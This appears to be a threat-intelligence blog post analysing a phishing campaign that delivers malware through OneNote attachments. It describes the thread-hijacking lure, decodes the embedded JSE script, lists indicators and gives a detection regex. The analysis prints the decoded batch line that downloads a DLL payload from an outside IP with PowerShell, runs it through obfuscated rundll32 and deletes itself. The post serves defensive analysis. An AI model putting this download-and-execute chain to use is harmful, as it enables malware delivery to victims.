"Are You at Risk? OneNote Attachments in Phishing Emails" - Understanding a New Threat Vector
-
The primary goals of this post are to:
1. Identify a sample and begin the triage process.
2. Identify patterns or groupings of email subjects and attachment names.
3. Capture the attack chain and note relevant finds.
Document_HM63(Feb15).one | 6501f736559758dffb5290bb76a1c168 | 09d582f8132b98d50be60207f8f18f1187fa142e4e6d29e56372f87a0cbd4069
As end-users become increasingly aware of the risks associated with malicious macro email attachments, malware authors have started exploring new methods of delivery. Since January, there have been reports of a new wave of phishing emails that carry OneNote (.one) file attachments. In this post, we will dive into this new threat vector and explore the attack chain as we observe it. We will also identify themes of phishing emails circulating in the wild (ITW), review attachment file name variations, and their antivirus detection names. Lastly, we'll get hands-on and examine one of the samples. Let's get started!
There are several ways to obtain malware samples for analysis. This can be done by leveraging access to malware repositories or looking through open source blogs for shared samples. Just remember to give credit for any formal products or reports. In this post, we will examine a sample obtained from VirusTotal (VT). Don't worry, all references for this analysis will be listed at the bottom for reference.
—The Email —
Beginning with Figure 1, we see an example email that exhibits several characteristics commonly found in phishing emails. Considering the email's tone, it conveys a sense of urgency and strongly encourages the recipient to open the attached OneNote (.one) immediately. In the body of the email, we see that the thread or conversation hijacking method being used, which is often leveraged to make the recipient believe they are continuing a previous conversation. This method is believable because legitimate emails are used from previously compromised systems. By keeping the entire thread intact, the malware author can spoof the legitimate sender and respond to the thread, making others believe the email is real.
— analyzing The Attachment —
Prior to execution, opening the attachment reveals a OneNote workbook page. A message is presented to the user, instructing them to click "Open" to access additional attachments stored in the cloud. Clicking the "Open" link will cause the .JSE file (Open.jse) file to be launched by the Windows Script Host (WHS) - WScript.exe. However, upon further examination of this .JSE file, we can see the encoded content when viewing it in Notepad. By using the Windows Script Decoder, we can quickly decode and view the script's content for further analysis.
To better understand the functionality of the code, an online JavaScript compiler can be used to break it up into pieces. Beginning with the largest function, 'avmJaznDU' appears to manipulate the string assigned to the 'data' variable. Within this function, the substr( ) method is used to take a substring of ‘string_data’ starting at an index of i with a length of 2. This essentially breaks up 'string_data' into pairs of characters and outputs them one at a time.
Figure 7. Decoded JSE Script
Once this occurs, the substring is passed as an argument to the parseInt( ) function with a radix of 16 (hexadecimal) to convert it from a hexadecimal value to a decimal value. This is then passed to the aQHuT8UN( ) function as an argument and returns a character. This character gets concatenated to the string stored in parsed_data. The for loop repeats this process for each pair of characters in string_data, effectively converting the entire string from hexadecimal to ASCII (see Figure 8). Finally, a new file named a8imoZ.cmd is created, and the previously mentioned concatenated data is written to it. The last line creates a new object called ActiveXObject, which allows the script to interact with Windows. This object is used to run the command 'a8imoZ.cmd NDLL' with a parameter of 0 to ensure that the window remains hidden from the victim when executed.
@echo off powershell.exe IWR -uri http://138.199.46.15/123/877173.dat -o %temp%\aQg9MHOT.tmp ru%132 %temp%\aQg9MHOT.tmp,Wind ( del /q /f "%~f0" >nul 2>&1 & exit /b 0 )
Figure 8. Open.jse Decode Data
Upon reviewing the code snippet above, it appears that the final payload is downloaded from http://138.199.46.15/123/ and is written to the %TEMP% directory as "aQg9MHOT.tmp". Once in the %TEMP% directory, a slightly obfuscated rundll32 command is executed. It is worth noting that running a file command on "aQg9MHOT.tmp" confirms that it is a DLL file.
Figure 9. FIle Command - TMP File
— The attack Chain —
So far in our analysis, we have seen the first few phases of the execution chain, starting from the initial email to the final payload, which is a DLL called aQg9MHOT.tmp. Below is an illustration of our observations thus far.
Figure 10. Attack Chain
This process starts with the user receiving an email accompanied by a OneNote (.one) attachment. Upon execution, Open.jse is launched, which creates a CMD file responsible for launching PowerShell to download the final payload (DLL).
-
138.199.46.15
782aafdd28e36417c43486fd42e06351 (aQg9MHOT.tmp)
46c9ff3c71ae3fdfef3449a108bb55e9 (877173.dat)
69C454D28A5B0C0559603C72109DFFF3 (Open.jse)
b3e328ec3bb70610eb0af44617353323 (a8imoZ.cmd)
__________Several of the observed email subjects use similar themes, including an attachment descriptor (e.g. Document, Contract, Cancellations, etc.), followed by an underscore, four alphanumeric characters, and the three-letter month and day in parentheses. Below is a regex pattern that can assist with capturing similar subjects.
.*_[A-Z0-9]{4}.[a-zA-z{3}]*[0-9]*\)
What did you think?!
Curious about something you read or have questions, contact us!
